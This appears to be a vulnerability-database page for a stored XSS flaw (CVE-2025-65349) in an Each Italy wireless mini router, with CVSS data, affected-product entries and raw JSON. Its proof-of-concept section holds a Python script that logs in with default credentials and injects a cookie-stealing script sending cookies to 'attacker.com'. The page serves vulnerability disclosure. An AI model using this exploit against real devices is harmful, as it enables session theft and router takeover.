Security Vulnerability Report
中文
CVE-2025-65349 CVSS 5.4 MEDIUM

CVE-2025-65349

Published: 2026-01-15 20:16:04
Last Modified: 2026-01-23 19:03:36

Description

A Stored Cross-Site Scripting (XSS) vulnerability in Web management interface in Each Italy Wireless Mini Router WIRELESS-N 300M v28K.MiniRouter.20190211 allows attackers to execute arbitrary scripts via a crafted payload due to unsanitized repeater AP SSID value when is displayed in any page at /index.htm.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:eachitaly:wireless_mini_router_wireless-n_300m_firmware:28k.minirouter.20190211:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:eachitaly:wireless_mini_router_wireless-n_300m:-:*:*:*:*:*:*:* - NOT VULNERABLE
Each Italy Wireless Mini Router WIRELESS-N 300M v28K.MiniRouter.20190211

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-65349 PoC - Stored XSS in Each Italy Router # Target: Each Italy Wireless Mini Router WIRELESS-N 300M # Vulnerability: Stored XSS via repeater AP SSID field TARGET_IP = "192.168.1.1" USERNAME = "admin" PASSWORD = "admin" # Malicious payload - Cookie stealing XSS XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' def exploit_stored_xss(): """ This PoC demonstrates the stored XSS vulnerability in the router's repeater AP SSID configuration. The payload is stored persistently and executed when any page is visited. """ # Step 1: Login to router web interface login_url = f"http://{TARGET_IP}/login.cgi" login_data = { "username": USERNAME, "password": PASSWORD } session = requests.Session() login_response = session.post(login_url, data=login_data) if login_response.status_code != 200: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Inject XSS payload into repeater AP SSID field ssid_url = f"http://{TARGET_IP}/repeater_ssid.cgi" ssid_data = { "ap_ssid": XSS_PAYLOAD, "apply": "Apply" } inject_response = session.post(ssid_url, data=ssid_data) if inject_response.status_code == 200: print("[+] XSS payload injected successfully") print(f"[+] Payload stored: {XSS_PAYLOAD}") print("[+] Payload will execute on any page visit at /index.htm") return True else: print("[-] Failed to inject payload") return False if __name__ == "__main__": exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65349", "sourceIdentifier": "[email protected]", "published": "2026-01-15T20:16:04.467", "lastModified": "2026-01-23T19:03:36.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-Site Scripting (XSS) vulnerability in Web management interface in Each Italy Wireless Mini Router WIRELESS-N 300M v28K.MiniRouter.20190211 allows attackers to execute arbitrary scripts via a crafted payload due to unsanitized repeater AP SSID value when is displayed in any page at /index.htm."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting almacenado (XSS) en la interfaz de gestión web en el Each Italy Wireless Mini Router WIRELESS-N 300M v28K.MiniRouter.20190211 permite a los atacantes ejecutar scripts arbitrarios a través de una carga útil manipulada debido a un valor SSID de AP repetidor no saneado cuando se muestra en cualquier página en /index.htm."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:eachitaly:wireless_mini_router_wireless-n_300m_firmware:28k.minirouter.20190211:*:*:*:*:*:*:*", "matchCriteriaId": "58145474-880B-4172-AEF6-25F25E35245B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:eachitaly:wireless_mini_router_wireless-n_300m:-:*:*:*:*:*:*:*", "matchCriteriaId": "B3D16F05-11ED-477B-BF5E-412FFB148954"}]}]}], "references": [{"url": "https://github.com/5ulfur/security-advisories/tree/main/CVE-2025-65349", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://imgur.com/a/X9DNOBj", "source": "[email protected]", "tags": ["Product"]}]}}